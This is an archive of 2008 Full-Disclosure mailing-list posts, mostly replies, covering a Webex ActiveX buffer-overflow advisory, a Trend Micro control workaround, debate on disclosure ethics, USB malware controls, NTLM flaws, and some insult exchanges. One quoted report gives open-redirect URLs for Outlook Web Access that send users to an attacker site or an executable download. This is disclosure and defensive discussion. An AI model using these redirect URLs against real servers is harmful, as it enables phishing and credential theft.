
Another possible fix for this is to copy the RemoveCtrl.cab from 
8.0(you can download it from here 
http://www.trendmicro.com/download/product.asp?productid=5, as 
stated above, 8.x is not vulnerable since the control uses *_s 
functions as opposed to the standard C functions). The 8.0 critical 
patch B1242 has a copy of this CAB so you don't need to download 
the entire 8.0 package, and replace the one located in the 
ClientInstall folder on the OfficeScan server. I have not tested to 
see if this breaks web deployment or not.  

--
Get great prices on a huge selection of brand name silk ties. Click now!
http://tagline.hushmail.com/fc/Ioyw6h4c1tQMG4FLeNJMaojFoAHna7mAn0iAWWKYagfAe4eOcH0JL6/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Webex atucfobj Module ActiveX Control Buffer Overflow Vulnerability

2008-08-06 Thread Elazar Broad

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Who:
Webex
http://www.webex.com/

What:
Webex Meeting Manager
http://support.webex.com/support/downloads.html

How:
The Webex Meeting Manager utilizes several ActiveX controls, one of
which is vulnerable to a stack based buffer overflow. The atucfobj
Module contains a single method called NewObject() who's only
parameter is vulnerable to this issue.

This issue has been confirmed in version 20.2008.2601.4928, prior
versions are believed to vulnerable as well.

atucfobj.dll version 20.2008.2601.4928
{32E26FD9-F435-4A20-A561-35D4B987CFDC}

Fix:
The vendor has released version 20.2008.2606.4919 of this control,
which fixes this issue. The control should be updated when the user
joins a meeting.

Workaround:
Set the killbit for the affected control. See
http://support.microsoft.com/kb/240797

Credit:
When I reported this issue to the vendor, they had stated that they
were aware of it, but would not say whether it was the result of an
internal audit or an independent researcher.

Timeline:
06/20/2008 -> Issue reported to the vendor
06/21/2008 <- Vendor responds asking for further details
06/22/2008 -> Details sent with PoC
06/25/2008 <- Vendor responds stating that they are aware of this
issue
08/06/2008 - Disclosure

Elazar

-BEGIN PGP SIGNATURE-
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0

wpwEAQECAAYFAkiZ3PAACgkQi04xwClgpZiyOgP8CM9oC+m3tr5TBU6ZbvacAcq/SqXu
zIUjqfGWz/GNaRRXISzPLrp7aYwepxXL/uxp+zmHR+h0phGOf2FoLmuBY1g3WULmaFu1
oQbGbVfNuS21qH/YvC9mWuOFSeoYOogsyKDGX1Iha6jNDsj5+JlbAIsqk9xwyb021eTm
BpGN3W8=
=tQOJ
-END PGP SIGNATURE-

--
Hotel pics, info and virtual tours.  Click here to book a hotel online.
http://tagline.hushmail.com/fc/Ioyw6h4eRCkjWyUGURkqKkn8TNo5LNJlfxlxQ4nlv0rtj3ey80N9EU/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] To disclose or not to disclose

2008-09-27 Thread Elazar Broad

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

I would opt for #1, additionally, contacting CERT and other quasi-
government security organizations would be a plus, they might have
better luck lighting a fire under the theoretical vendors ass...

elazar

On Sat, 27 Sep 2008 03:39:34 + Simon Smith <[EMAIL PROTECTED]>
wrote:
>Greetings,
>   I have a theoretical question of ethics for other security
>professionals that participate in this list. This is not an actual
>situation, but it is a potentially realistic situation that I'm
>interested in exploring and finding an acceptable solution to.
>
>   Supposed a penetration testing company delivers a service to a
>customer. That customer uses a technology that was created by a
>third
>party to host a critical component of their infrastructure. The
>penetration testing company identifies several critical flaws in
>the
>technology and notifies the customer, and the vendor.
>
>   One year passes and the vendor had done nothing to fix the issue.
>The
>customer is still vulnerable and they have done nothing to change
>their
>level of risk and exposure. In fact, lets say that the vendor flat
>out
>refuses to do anything about the issue even though they have been
>notified of the problem. Lets also assume that this issue affects
>thousands of customers in the financial and medical industry and
>puts
>them at dire risk.
>
>   What should the security company do?
>
>1-) Create a formal advisory, contact the vendor and notify them
>of the
>intent to release the advisory in a period of "n" days? If the
>vendor
>refuses to fix the issue does the security company still release
>the
>advisory in "n" days? Is that protecting the customer or putting
>the
>customer at risk? Or does it even change the risk level as their
>risk
>still exists.
>
>2-) Does the security company collect a list of users of the
>technology
>and notify those users one by one? The process might be very time
>consuming but by doing that the security company might not
>increase the
>risk faced by the users of the technology, will they?
>
>3-) Does the security company release a low level advisory that
>notifies
>users of the technology to contact the vendor in order to gain
>access to
>the technical details about the issue?
>
>4-) Does the security company do something else? If so, what is
>the
>appropriate course of action?
>
>5-) Does the security company do nothing?
>
>I'm very interested to hear what people thin the "responsible"
>action
>would be here. It appears that this is a challenge that will at
>some
>level create risk for the customer. Is it impossible to do this
>without
>creating an unacceptable level of risk?
>
>Looking forward to real responses (and troll responses too...
>especially
>n3td3v).
>
>--
>
>- simon
>
>--
>http://www.snosoft.com
>
>___
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
-BEGIN PGP SIGNATURE-
Charset: UTF8
Version: Hush 3.0
Note: This signature can be verified at https://www.hushtools.com/verify

wpwEAQECAAYFAkje3DUACgkQi04xwClgpZgNygP/QqmBS7EsjbZlKzVML7Cyl7oeSWlF
ROUxBygcf6uoXzHK0dOYDeCSltj+OZNOZHT8e2rcHp65XOJEqbZ8kfcU8tjeyVrYSr6k
kcyEzaNg0AijElSu4h2mBmig5c7LVbp8oqpASlTFccmlEDzjWFAo+uH01kDNEe6acM12
X/natz8=
=70tc
-END PGP SIGNATURE-

--
Enhance your home's curb appeal with name brand shutters. Click now.
http://tagline.hushmail.com/fc/Ioyw6h4dZrivVCHacmH7slSOQiWoYLmDiE5JIGDw7AHpcvidVlB4EY/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] To disclose or not to disclose

2008-09-28 Thread Elazar Broad

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Simon,
 If the issue really involves critical infrastructure you can
expect(to an extent) many government and quasi-government
organizations to step in  and pressure the vendor to fix the issue
before you go public. A real world example. At a recent conference,
I was talking to a security executive of a rather large utility and
the recently disclosed Citec issue came up. He mentioned that he
was at a certain government organizations lab while they were
assessing the issue based on the information they received from
CORE. If you read CORE's disclosure timeline, the real fire hadn't
been lit until this organization, along with some others, stepped
in and really got under the vendor's skin. He also mentioned how
clueless Citec's initial response was, but thats another story.
Given the general awareness of these organizations of the fact that
critical infrastructure vulnerabilities = potentially major
problems, I think setting a deadline(which will probably be
extended at the behest of these organizations) for the vendor is
not a bad idea, and the chances of the issue getting fixed before
you spill the beans are pretty high. You can't forget the
"somewhat" obvious as well, if you found it, someone else can find
it too. As far as the vendor is concerned, well, we all know what
happened to a certain electronic voting machine vendor...Look, I'm
not expert, this is just my .02...

elazar

On Sun, 28 Sep 2008 03:01:08 + Simon Smith <[EMAIL PROTECTED]>
wrote:
>Elazar,
>   I suppose that could be a good action, but doing that would
>potentially
>put the security companies customer at risk. Granted, in the
>argument
>they were already notified of the risk. So the question is, is
>that the
>ethical choice? Is that a good business choice?
>
>
>Elazar Broad wrote:
>> I would opt for #1, additionally, contacting CERT and other
>quasi-
>> government security organizations would be a plus, they might
>have
>> better luck lighting a fire under the theoretical vendors ass...
>>
>> elazar
>>
>> On Sat, 27 Sep 2008 03:39:34 + Simon Smith
><[EMAIL PROTECTED]>
>> wrote:
>>> Greetings,
>>> I have a theoretical question of ethics for other security
>>> professionals that participate in this list. This is not an
>actual
>>> situation, but it is a potentially realistic situation that I'm
>>> interested in exploring and finding an acceptable solution to.
>>
>>> Supposed a penetration testing company delivers a service to a
>>> customer. That customer uses a technology that was created by a
>>> third
>>> party to host a critical component of their infrastructure. The
>>> penetration testing company identifies several critical flaws
>in
>>> the
>>> technology and notifies the customer, and the vendor.
>>
>>> One year passes and the vendor had done nothing to fix the
>issue.
>>> The
>>> customer is still vulnerable and they have done nothing to
>change
>>> their
>>> level of risk and exposure. In fact, lets say that the vendor
>flat
>>> out
>>> refuses to do anything about the issue even though they have
>been
>>> notified of the problem. Lets also assume that this issue
>affects
>>> thousands of customers in the financial and medical industry
>and
>>> puts
>>> them at dire risk.
>>
>>> What should the security company do?
>>
>>> 1-) Create a formal advisory, contact the vendor and notify
>them
>>> of the
>>> intent to release the advisory in a period of "n" days? If the
>>> vendor
>>> refuses to fix the issue does the security company still
>release
>>> the
>>> advisory in "n" days? Is that protecting the customer or
>putting
>>> the
>>> customer at risk? Or does it even change the risk level as
>their
>>> risk
>>> still exists.
>>
>>> 2-) Does the security company collect a list of users of the
>>> technology
>>> and notify those users one by one? The process might be very
>time
>>> consuming but by doing that the security company might not
>>> increase the
>>> risk faced by the users of the technology, will they?
>>
>>> 3-) Does the security company release a low level advisory that
>>> notifies
>>> users of the technology to contact the vendor in order to gain
>>> access to
>>> the technical details about the issue?
>>
>>> 4-) Does the security company do something else? If so, what is
>>>

Re: [Full-disclosure] security industry software license

2008-10-15 Thread Elazar Broad

So take it up with him like a man and not on our inboxes...

On Tue, 14 Oct 2008 08:51:33 -0400 n3td3v <[EMAIL PROTECTED]> 
wrote:
>On Tue, Oct 14, 2008 at 1:28 PM, M. B. Jr. 
><[EMAIL PROTECTED]> wrote:
>> And by the way, why insistently and specifically targeting 
>Metasploit?
>
>i don't like hd moore
>
>___
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/

--
Master the road in style in an RV.  Click here for great deals.
http://tagline.hushmail.com/fc/Ioyw6h4c7Evfgrsmgllh0mHmFQeRdEwz6YCBETi8RpbjYUUjbHisBq/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Securing our computers?

2008-11-03 Thread Elazar Broad

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Whats your poison of choice?

On Mon, 03 Nov 2008 18:12:13 -0500 Michael Boman
<[EMAIL PROTECTED]> wrote:
>I already have a drinking game going, awarding myself a drink for
>every time n3td3v says something stupid, and every time I play it
>I
>run out of booze or blacks out... Dangerous stuff... If you are in
>my
>area we can play it together sometime...
>
>Best regards
>Michael Boman
>
>On Tue, Nov 4, 2008 at 12:06 AM, vulcanius <[EMAIL PROTECTED]>
>wrote:
>> Actually I think a new game should be created that revolves
>around stalking
>> n3td3v. Points would be awarded for the quickest response to
>each of his
>> worthless posts. At the end of the month a Stalker of the Month
>could be
>> selected and given a prize. Bonus points could be given out for
>the most
>> degrading responses. I think it could be a lot of fun.
>>
>> On Mon, Nov 3, 2008 at 4:58 PM, Ed Carp <[EMAIL PROTECTED]> wrote:
>>>
>>> Jesus ... you guys need to get back on your lithium...
>>>
>>> ___
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
>
>--
>http://michaelboman.org - Security Blog & Wiki
>
>___
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
-BEGIN PGP SIGNATURE-
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0

wpwEAQECAAYFAkkPp6EACgkQi04xwClgpZjskAP/a3SMEtnpaW35KeMcKTkcmdo/Z5Dy
IEJUk9PkyTzne+6xHqJ6ZTmeD27yAUNQTIZ68QpJlK/mCtZg0nRcjovV3P5+9dn1LcQ3
myyVoHyuz12oReXEw872nsPfEs7DK5UuplIueTqGW5YaFMZ/4DVgjI9fCo0hp20WbvS8
0IwZ5mc=
=jTLZ
-END PGP SIGNATURE-

--
Click to book your dream cruise.
http://tagline.hushmail.com/fc/Ioyw6h4eRWxzOp9csQYGzT9hU7Y75tPc0M6V5WkxPwHVmL1MeGyEmE/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Securing our computers?

2008-11-04 Thread Elazar Broad

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Beer, dry wine, single malts and the occasional shot of good Polish
potato vodka...

On Tue, 04 Nov 2008 00:17:17 -0500 Michael Boman
<[EMAIL PROTECTED]> wrote:
>Beer and Whiskey, unless you have a good Russian vodka - the
>Swedish
>ones ain't that good compared to the Russians.
>
>Best regards
>Michael Boman
>
>On Tue, Nov 4, 2008 at 2:38 AM, Elazar Broad <[EMAIL PROTECTED]>
>wrote:
>> -BEGIN PGP SIGNED MESSAGE-
>> Hash: SHA1
>>
>> Whats your poison of choice?
>>
>> On Mon, 03 Nov 2008 18:12:13 -0500 Michael Boman
>> <[EMAIL PROTECTED]> wrote:
>>>I already have a drinking game going, awarding myself a drink
>for
>>>every time n3td3v says something stupid, and every time I play
>it
>>>I
>>>run out of booze or blacks out... Dangerous stuff... If you are
>in
>>>my
>>>area we can play it together sometime...
>>>
>>>Best regards
>>>Michael Boman
>>>
>>>On Tue, Nov 4, 2008 at 12:06 AM, vulcanius <[EMAIL PROTECTED]>
>>>wrote:
>>>> Actually I think a new game should be created that revolves
>>>around stalking
>>>> n3td3v. Points would be awarded for the quickest response to
>>>each of his
>>>> worthless posts. At the end of the month a Stalker of the
>Month
>>>could be
>>>> selected and given a prize. Bonus points could be given out
>for
>>>the most
>>>> degrading responses. I think it could be a lot of fun.
>>>>
>>>> On Mon, Nov 3, 2008 at 4:58 PM, Ed Carp <[EMAIL PROTECTED]> wrote:
>>>>>
>>>>> Jesus ... you guys need to get back on your lithium...
>>>>>
>>>>> ___
>>>>> Full-Disclosure - We believe in it.
>>>>> Charter: http://lists.grok.org.uk/full-disclosure-
>charter.html
>>>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>>
>>>>
>>>> ___
>>>> Full-Disclosure - We believe in it.
>>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>>
>>>
>>>
>>>
>>>--
>>>http://michaelboman.org - Security Blog & Wiki
>>>
>>>___
>>>Full-Disclosure - We believe in it.
>>>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>>Hosted and sponsored by Secunia - http://secunia.com/
>> -BEGIN PGP SIGNATURE-
>> Charset: UTF8
>> Note: This signature can be verified at
>https://www.hushtools.com/verify
>> Version: Hush 3.0
>>
>>
>wpwEAQECAAYFAkkPp6EACgkQi04xwClgpZjskAP/a3SMEtnpaW35KeMcKTkcmdo/Z5D
>y
>>
>IEJUk9PkyTzne+6xHqJ6ZTmeD27yAUNQTIZ68QpJlK/mCtZg0nRcjovV3P5+9dn1LcQ
>3
>>
>myyVoHyuz12oReXEw872nsPfEs7DK5UuplIueTqGW5YaFMZ/4DVgjI9fCo0hp20WbvS
>8
>> 0IwZ5mc=
>> =jTLZ
>> -END PGP SIGNATURE-
>>
>> --
>> Find precision scales that can weigh anything. Click now!
>>
>http://tagline.hushmail.com/fc/Ioyw6h4dUuTd7dtWT7hv6q3aYswG8Qwo3mbs
>h76QpUCPJJNNuemryA/
>>
>>
>
>
>
>--
>http://michaelboman.org - Security Blog & Wiki
-BEGIN PGP SIGNATURE-
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0

wpwEAQECAAYFAkkQejwACgkQi04xwClgpZhsfgP9HIFtVvYCnAiH98dRHWDIgaNbMkEX
f7YiLnOq1ukT3o2JIRKg+dkUjHOcGjSq2r5HF7M8qnsR2qNwVtjfa3IoWMjgXNYwpXNa
C83n/H7A3FjUdr6FoLpb2PvGAa2gUFz2ERPZQZOY1KK8pWlPNEPKbZZbgfIRGM3jc3LT
6k1u/08=
=1Cyk
-END PGP SIGNATURE-

--
Click here to save cash and find low rates on auto loans.
http://tagline.hushmail.com/fc/Ioyw6h4ejOhn5aGxMAVXV99hi30bmWAil30Nvj48shBoA4hiNmaRjq/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Two bulletins from Microsoft on Patch Tuesday

2008-11-06 Thread Elazar Broad

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

What scene...

On Thu, 06 Nov 2008 20:06:47 -0500 n3td3v <[EMAIL PROTECTED]>
wrote:
>i've been monitoring the scene since 1999 so what do you mean no
>experience? i make that about 10 years experience if my math is
>correct.
>
>On Fri, Nov 7, 2008 at 12:48 AM, Biz Marqee <[EMAIL PROTECTED]>
>wrote:
>> Do you even understand why people dont like you? It is because
>you have all
>> these crackpot ideas but no experience to back it up. All your
>ideas only
>> make sense from a theoretical standpoint, but in practicality
>most will
>> fail.
>>
>> On Fri, Nov 7, 2008 at 11:31 AM, n3td3v <[EMAIL PROTECTED]>
>wrote:
>>>
>>> blackhats like you will always hate on me, so i just ignore the
>>> negative responses i get.
>>
>
>___
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
-BEGIN PGP SIGNATURE-
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0

wpwEAQECAAYFAkkT4VIACgkQi04xwClgpZjqkQP/TCHzaFO3ngEhyXoJPlowTfzidJzg
KyzTUAiLg4AKvqxXg+TSHiIkSDQWqCmzDr0qQ5OqywMgXmbWFNZzAdZuQtf5kW4KDBLx
eclRU3VoqfSCcEMb6puLNQdnHudcVxxZk1dQQdBLlfddHRuX6sGllNkVVvtiaYPnK1U1
QxmDKXU=
=bW8c
-END PGP SIGNATURE-

--
Click here to find old friends, lovers or family.
http://tagline.hushmail.com/fc/Ioyw6h4fH5T0ZWneBo4QKHZMbrYp7sz9W8sLWHvULRkY7oBbDmctTq/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] MS OWA 2003 Redirection Vulnerability - [MSRC 7368br]

2008-11-15 Thread Elazar Broad

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

A quick test of OWA 2007 shows that it is not vulnerable...

On Sat, 15 Nov 2008 11:36:26 -0500 Micheal Cottingham
<[EMAIL PROTECTED]> wrote:
>I found and reported this back in 2005/2006. Microsoft told me
>that it
>had been reported previously and that it would be fixed in the
>next
>release, which I'm guessing they meant 2007. I do not know if they
>have fixed it in Exchange 2007.
>
>On Sat, Nov 15, 2008 at 5:33 AM, Piergiorgio Venuti
><[EMAIL PROTECTED]> wrote:
>> Hi all,
>> also I've found this vulnerability 1 year ago during a pt and
>work fine
>> with url obfuscation. I've read that with owa 2007 this
>vulnerability is
>> patched but I don't have tried yet.
>>
>> Best regards,
>> Piergiorgio
>>
>>
>> Giuseppe Gottardi ha scritto:
>>> Davide, let me comfort you...
>>>
>>> I found this vulnerability 1 year ago during a penetration test
>>> activity and I never reported before for my negligence :-)
>>>
>>>
>https://owa/CookieAuth.dll?GetLogon?url=%2Fexchweb%2Fbin%2Fredir.as
>p%3FURL%3Dhttp%3A%2F%2Fwww.google.it&reason=0
>>>
>>> Best regards,
>>> oveRet
>>>
>>>
>>> On ven, 2008-10-17 at 21:07 +0200, Davide Del Vecchio wrote:
>>> Hi,
>>>
 I found and notified this vulnerability to Microsoft in date:

 Tue, 10 Apr 2007 15:40:13 +0200

 You read exactly, April 2007, 1 year and 6 months ago. :(

 The Microsoft Security Response Center opened the case ID MSRC
>7368br.

 The bug has never been patched since 1 year and 6 months.
 I asked time to time for updates but they always answered me
>that the
 bug had to be patched with the next Service Pack and they did
>not have
 any ETA.

 This SP has still to be released.

 They told me that if I released the vulnerability prior to the
>official
 patch, I could not be officially credited for that. I tought
>it was not
 a critical vuln, and so I waited. Too much (?).

 I am a bit sorry for Microsoft, I think they lost an other
>chance since
 now I feel a bit tricked. I am not sure if the next time I
>will wait so
 much and I am not sure if I will suggest to anyone to wait for
>the
 patch. I just hope Microsoft will credit me in the official
>patch. :(

 Below you can find the first mail I wrote to MS regarding the
>issue.

 Best regards,

 Davide Del Vecchio.


 From: "Davide Del Vecchio" <[EMAIL PROTECTED]>
 To: [EMAIL PROTECTED]

 Subject: Microsoft Outlook Web Access "redir.asp" Redirection
>Weakness
 Date: Tue, 10 Apr 2007 15:40:13 +0200

 Hello,

 I found a weakness in Microsoft Outlook Web Access (OWA),
>which
 potentially can be exploited by malicious people to conduct
>phishing
 attacks.
 The weakness is caused due to a design error in the way OWA
>uses an
 unverified user supplied argument to redirect a user after
>successful
 authentication.
 This can e.g. be exploited by tricking a user into following a
>link from
 a HTML document to the trusted login page with a malicious
>"url" parameter.
 After successful authentication, the user will be redirected
>to the
 untrusted (fake) site.

 The affected product is:
 Microsoft Outlook Web Access ( OWA )
 Windows 2003

 Examples:
 https://[owa-
>url]/exchweb/bin/redir.asp?URL=http://www.example.com

 this will take the user to http://www.example.com when the
>login box
 is pressed.

 https://[owa-
>url]/exchweb/bin/redir.asp?URL=http://www.example.com/setup.exe
 prompts the user to download an executable or other file.

 The attacker can then have a page to capture the user /
>password
 and redirect back to the original login page or some other
>form of
 phishing attack.

 Note that this vulnerability is very similar to the one
>affecting
 "owalogin.asp" described here:
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0420

 Best regards,

 Davide Del Vecchio.

 Martin Suess ha scritto:

 ...


> Timeline:
> -
> Vendor Status:  MSRC tracking case closed
> Vendor Notified:March 31st 2008
> Vendor Response:May 6th 2008
> Advisory Release:   October 15th 2008
> Patch available:- (vulnerability not high priority)
>

>>>
>>>
>>>
>>
>>
>> --
>> +
>--+
>> | Ing. Piergiorgio Venuti, CCSP
>  |
>> | 0x5ECFE022 -B44B C817 3793 C7C7 2734 F898 DE03 8961
>5ECF E022|
>> +
>--+
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>___
>Full-Disclosure

Re: [Full-disclosure] [inbox] Re: Fwd: Comment on: USB devices spreading viruses

2008-11-23 Thread Elazar Broad

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Symantec's Endpoint Protection has a device control feature which
basically functions as you have stated. I haven't really played
around with it much, however, it can block devices based on device
id...

elazar

On Mon, 24 Nov 2008 00:17:34 -0500 Bipin Gautam
<[EMAIL PROTECTED]> wrote:
>On 11/24/08, James Matthews <[EMAIL PROTECTED]> wrote:
>> bit9 and kaspersky offer this new service. Companies should make
>use of it.
>>
>
>what service, James!
>
>Could you please explain more...
>
>I find it ridicules to know that this problem has been there since
>the
>earliest version of windows but still without a generic solution!
>Is
>this unwillingness for the approach to a proper solution is what
>has
>fueled the "antivirus business" for so long?
>
>If you look in the *nix side you will see this technique is
>tested/proven. Signature based or behavior based approach
>detection
>will continue to fail.
>
>To address this never-ending problem of virus infection from
>removable
>media, i have implemented no-execution-from-removable to dorzons
>of
>computers in the past years, even the dumbest of users understand
>what
>is being done and feel safe about they wont likely have virus
>infection from the removable media ever, even if the media has a
>virus. They know workaround on how to temporarily disable the
>restriction if they are willing to run something trustworthy as i
>have
>made the users clear there is no solution to the problem of virus
>infection from removable media and and you have to learn these few
>things ...like you have learned to use antivirus software to stay
>safe. Users get it, really!
>
>Antivirus companies should take similar approach (as described
>previously) to address it but adding USABILITY.
>
>This problem is there to stay for years to come. What better could
>be
>the proper solution to this problem?
>
>thanks,
>-bipin
>
>
>
>> On Sun, Nov 23, 2008 at 10:05 PM, Bipin Gautam
>> <[EMAIL PROTECTED]>wrote:
>>
>>> On 11/23/08, Mike C <[EMAIL PROTECTED]> wrote:
>>>
>>> >> Of course, blindly thwacking people / dragging them to HR by
>the hair
>>> >> when they're really just trying to do their jobs is
>>> >> counter-productive. The calls also show us where we,
>security, are
>>> >> falling down. Perhaps it's poor awareness training (if the
>user didn't
>>> >> know that they shouldn't run unapproved software, or why we
>have that
>>> >> rule, or how to get a new app approved); or could be that
>the official
>>> >> route is being seen as too slow or bureaucratic, in which
>case it
>>> >> needs fixing. And so on.
>>> >>
>>> >
>>> > All I hope is we can fix the issue. Hopefully in the near
>future.
>>> >
>>>
>>>
>>> Yeah!
>>> Here is my prospective to a possible solution that wouldn't
>compromise
>>> usability.
>>>
>>> But, first lets all agree on "banning execution of any binary
>from
>>> removable media" is the only straightforward solution this
>decades old
>>> problem of virus infection/propagation from removable media.
>>>
>>> See, if a web-page tries to install an activeX / browser
>plugin, your
>>> browser (non intrusively) waits for user interaction with a
>security
>>> warning message on "if you really intend to install the plugin
>(Which
>>> may be harmful!)" or ...may choose to ignore the dialog and
>>> continue browsing.
>>>
>>> Here, it is assumed "user understands" the security impact of
>>> executing untrusted programs from internet and let the
>execution
>>> decision left to the end user with manual interaction. If the
>plugin
>>> installation behavior is not intended user can simply ignore
>the
>>> manual interaction request for execution and instead continue.
>>>
>>> In similar way, anti virus company or Microsoft should create
>similar
>>> for "My Computer Zone" where the first execution of a binary
>"from
>>> removable media" is denied by default and prompt for user
>interaction
>>> to execute, white list&execute or terminate/ban the request for
>>> execution from removable media like the way internet explorer
>(non
>>> intrusively) handles installation of activeX like in IE. Binary
>>> execution from removable media should be treated that way (
>untrusted
>>> ! )
>>>
>>> Pen drive / SD have unique serial numbers which can be used to
>>> identify and permanently whitelist or blacklist the media from
>>> execution.
>>>
>>> Windows already has a feature for prompting if user tries to
>execute
>>> binary from intranet/shared folder or execution of binary
>marked as
>>> downloaded from "Internet Zone"
>>>
>>> Why not have similar for binary execution from removable media
>as well!?
>>>
>>> What better could be the solution to stopping virus to
>propagate from
>>> removable medias with (default) FAT file system. (lacking
>ACL's)
>>>
>>> For corporate environment let there be feature to sync these
>white
>>> listed/blacklisted hashes of executable or removable media UID
>from
>>> anti virus server/domain controller to anti virus
>clients/r

Re: [Full-disclosure] Microsoft takes 7 years to 'solve' a problem?!

2008-11-26 Thread Elazar Broad

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Um, NTLM isn't the only 20 or so year old protocol to take the rap
recently, I can think of a low numbered rfc, lets say 1034 and
1035. Hindsight is 20/20, and 20 years ago, who would have thought
that a 16 bit number was way too small for DNS transaction id, the
same "who would have though" goes for NTLM and the rest. Lets face
it, protocol design bugs suck, and to completely replace a widely
used protocol ranks pretty high in the PiTA hall of fame...

On Tue, 25 Nov 2008 05:25:57 -0500 Eric Rachner <[EMAIL PROTECTED]>
wrote:
>Hey, kid -
>
>If you've got any better ideas about how to fix NTLM, the industry
>is ready
>& waiting to hear them.
>
>The fact is, NTLM is an old & busted protocol that happens to be
>used *
>everywhere*, and there's no way to fix it without breaking
>compatibility
>with, oh, just the entire installed base.  I was happy to see MS08-
>068
>because the technique it implements is better than nothing - it
>offers a
>nice, clever way to reduce the exploitability of the issue without
>breaking
>anything important.
>
>Don't bother telling us all how M$ should just bite the
>incompatibility
>bullet and turn NTLM off - that's been an option for users,
>theoretically
>speaking, since about the time Windows Kerberos support became
>mature, and
>practically speaking, nobody seems to be turning NTLM off here in
>the real
>world.
>
>- Eric
>
>On Tue, Nov 25, 2008 at 7:44 AM, Memisyazici, Aras <[EMAIL PROTECTED]>
>wrote:
>
>> 
>>
>> > http://blogs.technet.com/msrc/archive/2008/11/11/ms08-068-and-
>smbrelay.aspx
>> >
>>
>> What we released today with MS08-068 is that security update. It
>addresses
>> the SMBRelay issue (discovered in 2001) does so in a way that
>doesn't have
>> the negative impact on applications that we originally believed
>addressing
>> this issue would have.
>>
>> 
>>
>> So... Hmm... I wonder what would happen if the rest of the world
>followed
>> suit with M$' approach, and took 7 years to "fix" an issue in
>order to "not
>> cause a significant impact"...
>>
>> Scenario:
>>
>> Ppl: Hey Ford, if one brute-forces the keyless entry on the
>door, you're
>> car explodes...
>>
>> Ford: well... I'll offer you three choices, two immediately, and
>the last
>> one 7 yrs later. You can either not use the keyless entry system
>(we'll give
>> you some shiny duck-tape to cover it) or you can use the
>biometric-knub
>> system which requires that you have a knub... So those who have
>arms & legs
>> can't use the system... (btw this will give birth to a whole new
>industry
>> that will allow ppl to pay money for a product that fakes a knub
>for people
>> with appendages) But it's biometric & cool this way! Or you can
>wait for 7
>> years and we'll release a non-exploding version of the keyless-
>entry system.
>>
>> ***
>>
>> OK... Maybe I'm going a bit extreme, but WTH?! Am I the only one
>who is
>> interpreting this, this way? Really? When has releasing a
>solution to a
>> problem 7 years later ever been acceptable?
>>
>> Jus' sayin' ...
>>
>> 
>>
>> Aras 'Russ' Memisyazici
>> Systems Administrator
>> Virginia Tech
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
-BEGIN PGP SIGNATURE-
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0

wpwEAQECAAYFAkktAd8ACgkQi04xwClgpZhz/wP/XksVY9PcYZ9Rs5iDMAkw7qa/2FIw
UsdD78zHzH5JuFTl0gTozNBRJwWZfxdp3frDjtKAIUl6qVvhd2Kv/lOzVU70mNm/4VlM
tC+YqiYMVuMC0flaUwYOxOwfcxaXE+YBWWxMvM7DgNayVqiAwhrsyPNQLv3dAc6jaXtC
rvGdXhI=
=8pzj
-END PGP SIGNATURE-

--
Click for amazing quotes from local deck contractors & remodelers.
